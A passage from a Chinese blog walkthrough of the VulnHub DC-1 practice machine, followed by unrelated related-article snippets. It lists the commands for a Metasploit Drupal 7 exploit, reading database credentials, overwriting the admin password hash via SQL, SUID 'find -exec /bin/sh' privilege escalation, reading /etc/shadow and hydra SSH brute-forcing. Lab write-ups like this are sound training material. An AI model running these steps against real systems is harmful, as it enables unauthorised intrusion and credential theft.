DC-1靶机刷题记录

靶机下载地址:

链接:https://pan.baidu.com/s/1GX7qOamdNx01622EYUBSow?pwd=9nyo 
提取码:9nyo 

参考答案:

  • https://c3ting.com/archives/kai-qi-vulnhnbshua-ti
  • DC-1.pdf
  • 【【基础向】超详解vulnhub靶场DC-1】 https://www.bilibili.com/video/BV1xN4y1V7Kq/?share_source=copy_web&vd_source=12088c39299ad03109d9a21304b34fef
  • http://t.csdnimg.cn/b0gYE
开启Vulnhnb刷题
今天是DC-1介绍页:DC: 1 ~ VulnHub下载地址:http://www.five86.com/downloads/DC-1.zip
——来自C3ting

1、导入VMware虚拟机

下载完成后,得到DC-1.ova文件,导入到VMware后,设置靶机和kali的网络连接模式为NAT模式,靶机会自动获取ip地址。

image.png
试了半天DC-1都没有IP,原来是VMware没开这个DHCP
image.png
image.png
测试发现是这个129的IP
image.png

描述
DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot
Security OS上找到的工具。有多种方法可以获得根,但是,我包含了一些包含初学者线索的标志。总共有五个标志,但最终目标是在root的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作,但是,您将需要 root
用户权限。根据您的技能水平,您可以跳过查找这些标志中的大多数,直接找到root。初学者可能会遇到他们以前从未遇到过的挑战,但是Google搜索应该是获取完成此挑战所需的信息所需的全部内容。

使用工具

攻击者:kali 192.168.1.128
靶机:dc-1 192.168.1.129

一:信息收集

基础信息查询

0x01 查看存活主机
arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探

image.png
发现192.168.1.129就是DC-1靶机的IP。

0x02 查看开放端口 和 0x03 查看端口服务
nmap -p- 192.168.1.129
nmap -p- 192.168.1.129命令是使用nmap工具进行针对IP地址为192.168.1.129的主机的端口扫描。在该命令中,-p-选项用于指定要扫描的所有端口范围。通常情况下,-p-表示扫描所有65535个端口。执行此命令后,nmap将尝试连接到目标主机的每个端口,并确定它们是否开放。扫描完成后,将显示每个开放端口及其相应的服务信息。请注意,在使用nmap进行端口扫描时,请确保您遵守适用的法律和道德规范,并且只在合法的环境中使用该工具。未经授权的扫描可能会违反法律,并对目标网络造成不良影响。同时也要注意的是,执行完整的端口扫描(例如扫描65535个端口)可能需要一些时间才能完成,因为扫描过程可能涉及大量的网络流量和主机响应。

image.png
然后直接去看它的这个网站
image.png

0x04 扫描网站根目录及指纹信息
  • 可以用浏览器插件Wappalyzer来进行查看

image.png
也可以用命令whatweb [http://192.168.1](http://192.168.10.157).129 # 扫描网站指纹信息
image.png
WhatWeb是一个开源的Web应用程序识别工具,用于快速识别并获取目标网站的技术信息和已知漏洞。它通过分析HTTP响应报文、页面内容和其他特征来确定目标网站所使用的Web框架、CMS(内容管理系统)、服务器软件版本等信息。
WhatWeb可以帮助安全研究人员和渗透测试人员快速了解目标网站的技术栈,从而评估可能存在的漏洞和攻击面。它还提供了针对特定Web应用程序的插件系统,用于更详细地识别和探测特定的功能和配置。
以下是使用whatweb的基本语法:

whatweb <target>

其中:

  • 是要扫描的目标网站URL或IP地址。

例如,要对网站example.com进行识别和扫描,可以执行以下命令:

whatweb example.com

WhatWeb会发送HTTP请求到目标网站,并分析响应以确定目标网站所使用的技术信息。它将显示Web框架、CMS、JavaScript库、服务器版本等相关信息。

接着继续:
发现CMS是Drupal 7,那么我们便可以去查找相关的漏洞了,有POC就可以直接利用
可以在kali的火狐浏览器自带的一个网站,漏洞库网站,搜索Drupal 7查看一下,对它进行一个简单的了解
image.png

二:漏洞发现

msf漏洞查询

kali的msf怎么用 - CSDN文库
image.png

0x01 启动msf
msfconsole
search Drupal 7 

image.png
image.png
一个个尝试着使用(Rank 为excellent的成功概率大一点,比较好用)

use 1
set Rhosts 192.168.1.129
show options 
expliot 或者 run

image.png
输入shell 后,python -c 'import pty;pty.spawn("/bin/bash")'开启终端
image.png

0x02 flag1

在当前目录下就发现了flag1.txt
内容为

Every good CMS needs a config file and so do you.每一个好的CMS都需要一个配置文件,你也是。

image.png
flag提示我们查看config配置文件,
百度之后发现,Drupal的配置文件(settings.php)在sites/default/ 中
cd到sites/default/中查看

0x03 flag2

一直滑到最上面,看到flag2和MySQL数据库账户及密码,尝试登录查找信息
image.png

0x04 查询数据库信息
mysql -u dbuser -p R0ck3t

image.png
登录成功,查询账号密码

show databases;
use drupaldb
show tables;
select* from users;

image.png
根据经验判断,其中的这个users表最重要,是用户表
image.png
image.png
查询到账户密码,这里的密码为密文加密,尝试使用md5解密,发现解密失败

三:漏洞利用

0x01 破解密码加密

drupal可以利用Drupal对数据库的加密方法,加密脚本位置在网站目录/var/www下的scripts文件夹下
image.png
我们利用脚本password-hash.sh对我们需要的密码进行加密,
结果出现报错了
image.png
报错中之处,'/var/www/srcipts/includes/password.ins’文件找不到,但是刚才发现,includes目录不在scripts目录下,因此会报错。
使用命令 cp -r ../includes ./复制整个includes目录到scripts目录里,再次执行,成功对123456进行加密
image.png
然后进入数据库更新admin密码

update users set pass='$S$DzkiWh8/yFmP15e/BB/CYd9TtEUTbrYpBe2vnqeP6B3bZLdrzyUu' where name='admin';

之后,成功进入后台,得到flag3
image.png
image.png
image.png
image.png

flag3提示:

提示到 find提权,-exec shadow文件 passwd文件
image.png
flag3指出,特殊全是是需要用到 find 和 -exec 命令,也提到了 shadow。就是说提权的话,需要用到以上两个命令,以及shadow文件。
于是,我们尝试查看shadow文件,提示权限不够
image.png
那么我们需要提权
image.png
image.png
那么我们输入find / -perm -u=s -type f2>/dev/null命令看一下哪些具有特殊权限位
image.png
结束输入find -name mysql -exec /bin/sh \;就获得了root权限
image.png
那么在继续查看刚才的shadow文件,发现flag4是一个用户

/etc/shadow是一个位于Linux系统中的文件路径,它存储了用户账户的加密密码信息。这个文件通常只有超级用户(root)有读权限。

image.png
那么我们就去/home目录下看flag4的文件,发现了flag4

/home是Linux系统中的默认用户主目录的位置。在大多数Linux发行版中,每个用户都有一个对应的主目录,该目录位于/home下,以用户的用户名命名。每个用户的主目录存储着用户的个人文件和配置信息。当用户登录时,系统会将用户导航到其相应的主目录,以提供用户特定的工作环境。用户可以在自己的主目录中创建、编辑和管理文件,保存个人数据、配置文件和其他与用户相关的内容。例如,如果系统上有一个名为"john"的用户,那么他的主目录路径将为/home/john。用户john可以在此目录下创建自己的文件夹和文件,并且只有他有权限访问这些文件。
flag4

image.png
提示可以用相同的方法获得最后的flag

flag4的方法二:

用到一个工具:
Hydra是一个密码破解工具,用于暴力破解各种网络服务的用户名和密码。它可以通过使用不同的用户名和密码组合进行自动化的登录尝试,从而尝试获取对目标系统或应用程序的访问权限。
Hydra支持多种协议和服务,包括但不限于SSH、FTP、HTTP、SMTP、POP3、Telnet等。它使用多线程方式进行破解尝试,以提高效率和速度。
以下是使用Hydra的基本语法:

hydra -l <username> -P <password_file> <target> <service>

其中:

  • -l 选项用于指定要尝试的用户名。
  • -P 选项用于指定密码文件,该文件包含要尝试的密码列表。
  • 参数用于指定目标主机或IP地址。
  • 是要攻击的目标服务,例如ftp、ssh、http等。

例如,要使用Hydra对FTP服务进行密码破解,用户名为"admin",密码列表保存在名为"passwords.txt"的文件中,并且目标主机为192.168.0.1,可以执行以下命令:

hydra -l admin -P passwords.txt 192.168.0.1 ftp

那么我们就开始操作

gzip -d rockyou.tar  #解压密码字典
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.129     
#尝试爆破flag4的密码

image.png
获得密码orange

然后ssh远程连接

image.png

flag5

那么去到root目录下就看见了flag5
image.png
image.png

完毕!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/634566.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

禅道:从安装到使用,一篇文章带你全面了解

博客前言&#xff1a; 在这个充满竞争和快节奏的世界里&#xff0c;项目管理已经成为了许多行业的关键环节。禅道作为一种功能强大、易用的项目管理工具&#xff0c;正在被越来越多的企业和团队所采用。它不仅能帮助我们高效地管理项目&#xff0c;还能提升团队协作和沟通的效…

为什么JavaScript中0.1 + 0.2 ≠ 0.3

JavaScript中的浮点数运算有时候会出现一点偏差。下面解释为什么0.1 0.2 ≠ 0.3,以及如果你需要精确运算应该怎么做。 如果1 2 3,那么为什么在JavaScript中0.1 0.2 ≠ 0.3?这个原因与计算机科学和浮点数运算有关。 我建议你打开浏览器的控制台,输入0.1 0.2来查看结果。…

带你学C语言-指针(4)

目录 ​编辑 ⚾0.前言 &#x1f3c0;1.回调函数 ⚽2.qsort &#x1f3c9;2.1 qsort函数的模拟实现 &#x1f3be;3.sizeof与strlen对比 &#x1f3be;4.结束语 ⚾0.前言 言C之言&#xff0c;聊C之识&#xff0c;以C会友&#xff0c;共向远方。各位CSDN的各位你们好啊&…

【JS逆向学习】36kr登陆逆向案例(webpack)

在开始讲解实际案例之前&#xff0c;大家先了解下webpack的相关知识 WebPack打包 webpack是一个基于模块化的打包&#xff08;构建&#xff09;工具, 它把一切都视作模块 webpack数组形式&#xff0c;通过下标取值 !function(e) {var t {};// 加载器 所有的模块都是从这个…

【RocketMQ每日一问】RocketMQ nameserver的作用是什么?

Name Server 在 Apache RocketMQ 集群中扮演着以下几个重要作用&#xff1a; 服务注册与发现&#xff1a; Name Server 负责管理和协调整个集群&#xff0c;维护集群中所有 Broker 的信息&#xff0c;包括 Broker 的 IP 地址、端口号、存储容量等。当 Producer 和 Consumer 需…

【消息队列】RocketMQ 生产和消费中的集群模式和广播模式

在消息队列系统中&#xff0c;生产者和消费者的模式通常包括集群模式和广播模式。这两种模式分别用于不同的场景&#xff0c;具有不同的特点和优势。 1. 集群模式&#xff08;Cluster Mode&#xff09;&#xff1a; 在集群模式下&#xff0c;多个相同角色的实例组成一个集群&…

太帅了 soeasy两行命令创建一个文件系统

看三遍 看三遍 看三遍 A file list program that supports multiple storage, powered by Gin and Solidjs. 翻译:一个支持多个存储的文件列表程序&#xff0c;由Gin和Solidjs提供支持。 1.安装 命令1:创建目录 mkdir -p /opt/alist 命令2:创建容器 docker run -d \ --res…

一天吃透Redis面试八股文

目录&#xff1a; Redis是什么&#xff1f;Redis优缺点&#xff1f;Redis为什么这么快&#xff1f;讲讲Redis的线程模型&#xff1f;Redis应用场景有哪些&#xff1f;Memcached和Redis的区别&#xff1f;为什么要用 Redis 而不用 map/guava 做缓存?Redis 数据类型有哪些&…

UE5 C++ 基础变量类型,关于框架的初级练习

一.创建自己的MyGameModed。并在其中设置好GamePlay框架。 1.创建MyGameState,MyGameState,MyHUD,MyPawn&#xff0c;MyPawn&#xff0c;MyPlayerController,MyPlayerState。 2.并在MyGameMode的头文件里面&#xff0c;把GmaeMode里的框架需要的框架类都包含进去。 3.写一个构…

用微服务快速开发框架实现流程化办公!

实现流程化办公&#xff0c;可以助力企业提升市场竞争力&#xff0c;从而实现数字化转型升级。微服务快速开发框架是提升办公协作效率的得力助手&#xff0c;流辰信息以市场为导向&#xff0c;坚持自主研发与创新&#xff0c;始终为行业的进步和发展贡献应有的力量。 1、流程化…

【EI会议征稿通知】2024年通信技术与软件工程国际学术会议 (CTSE 2024)

2024年通信技术与软件工程国际学术会议 (CTSE 2024) 2024 International Conference on Communication Technology and Software Engineering (CTSE 2024) 2024年通信技术与软件工程国际学术会议 (CTSE 2024)将于2024年03月15-17日在中国长沙举行。会议专注于通信技术与软件工…

LLaVA-Plus:多模态大模型的新突破

前言 随着AIGC技术的不断进步&#xff0c;各类多模态大模型&#xff08;MLM&#xff09;开始蓬勃发展。在这一领域中&#xff0c;LLaVA-Plus的推出无疑是一次重大突破。作为LLaVA团队的最新工作&#xff0c;LLaVA-Plus不仅继承了LLaVA的优秀特性&#xff0c;还在此基础上进行了…

ChatGPT提示词保姆级教程

现在越来越多提示词教程&#xff0c;本文列个清单&#xff0c;方便以后整理&#xff0c;不定期更新&#xff0c;欢迎关注留言&#xff01; 后续更新欢迎关注 提示词&#xff08;prompt&#xff09;出来后&#xff0c;被称为一个新的岗位诞生&#xff0c;面向提示词工程师。 …

dns正反解析配置

1.配置正向解析baidu.com 1、下载bind包 [rootlocalhost ~]# yum install bind -y 2、对配置文件修改 [rootlocalhost ~]# vim /etc/named.conf 3、对数据文件修改 [rootlocalhost ~]# vim /var/named/baidu 4、重启服务 [rootlocalhost ~]# systemctl restart named.service 5…

hash应用

目录 一、位图 1.1、引出位图 1.2、位图的概念 1.3、位图的应用 1.4、位图模拟实现 二、布隆过滤器 2.1、什么是布隆过滤器 2.2、布隆过滤器应用的场景 2.3、布隆过滤器的原理 2.4、布隆过滤器的查找 2.5、布隆过滤器的插入 2.6、布隆过滤器的删除 2.7、布隆过滤器…

行云部署前端架构解析-前言 | 京东云技术团队

一个简单的自我介绍 项目规模 截止目前上万次代码提交&#xff0c;总代码行数1超过21万行&#xff0c;其中人工维护的代码超过 13万行&#xff0c;近千个文件。 前端线上服务直接对接的后端服务&#xff0c;达十多个。 跟很多应用一样, 它有行云的入口, 也有独立的服务, 还…

Rust-泄漏

在C中&#xff0c;如果引用计数智能指针出现了循环引用&#xff0c;就会导致内存泄漏。而Rust中也一样存在引用计数智能指针Rc,那么Rust中是否可能制造出内存泄漏呢? 内存泄漏 首先&#xff0c;我们设计一个Node类型&#xff0c;它里面包含一个指针&#xff0c;可以指向其他…

CC工具箱使用指南:【计算面积】

一、简介 在Arcgis中&#xff0c;如果要计算面要素的面积&#xff0c;有几种方法。 1、gdb数据会自带一个shape_area字段&#xff0c;这就是面的平面面积&#xff0c;单位是平方米&#xff1a; 2、在双精度字段上右键单击&#xff0c;在弹出的菜单中点击【计算几何】&#xf…

【JavaEE进阶】 依赖注⼊DI详解

文章目录 &#x1f334;什么是依赖注入&#x1f384;依赖注入的三种方法&#x1f6a9;属性注⼊(Field Injection)&#x1f6a9;构造⽅法注⼊&#x1f6a9;Setter注⼊&#x1f6a9;三种注⼊的优缺点 &#x1f333;Autowired存在的问题&#x1f332;解决Autowired存在的问题&…

【算法练习】leetcode算法题合集之栈和队列篇

普通栈 LeetCode20 有效的括号 LeetCode20 有效的括号 定义一个辅助map&#xff0c;判断字符串的字符是否在]})中。一旦是右括号就要弹出元素&#xff0c;判断匹配。 class Solution {public boolean isValid(String s) {if (s.length() % 2 1) {return false;}Map<Chara…